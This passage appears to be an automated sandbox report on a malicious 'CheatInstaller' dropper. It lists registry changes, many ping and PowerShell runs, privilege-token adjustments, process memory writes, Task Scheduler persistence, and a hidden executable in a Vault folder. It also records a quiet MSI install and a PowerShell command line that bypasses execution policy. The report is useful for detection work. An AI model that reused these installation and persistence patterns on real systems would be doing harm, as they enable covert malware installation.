Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Version = "35651584" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" C:\Windows\system32\msiexec.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3284 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe
PID 3284 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe
PID 3284 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe
PID 4292 wrote to memory of 3908 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4292 wrote to memory of 3908 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4292 wrote to memory of 3908 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4720 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 4720 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 4720 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 4292 wrote to memory of 3156 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4292 wrote to memory of 3156 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4292 wrote to memory of 3156 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3156 wrote to memory of 4492 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 3156 wrote to memory of 4492 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 5904 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4492 wrote to memory of 5904 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 5904 wrote to memory of 6132 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 6132 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 6132 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 4756 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 4756 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 4756 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 3472 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 3472 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 3472 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4292 wrote to memory of 2152 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4292 wrote to memory of 2152 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4292 wrote to memory of 2152 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 5904 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 5780 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 5780 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 5780 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 5788 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 5788 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 5788 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 5532 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 5532 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 5532 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 3112 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 3112 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 3112 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 5336 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 5336 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 5336 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 5712 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 5712 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 5712 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 4128 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 4128 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 4128 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 320 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 320 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 320 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 4648 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 4648 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 4648 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 4616 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 4616 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5904 wrote to memory of 4616 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\RUN.exe

"C:\Users\Admin\AppData\Local\Temp\RUN.exe"

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe

.\Install_YTTCHTs.exe

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding E2038926FB8E89C51046C2EC332A3A62 C

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi" /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1710532442 " ALLUSERS="1"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 3E8C0A75A229AFD3985AFCE17844D936

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss60EF.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi60DD.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr60DE.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr60DF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Windows\system32\cmd.exe

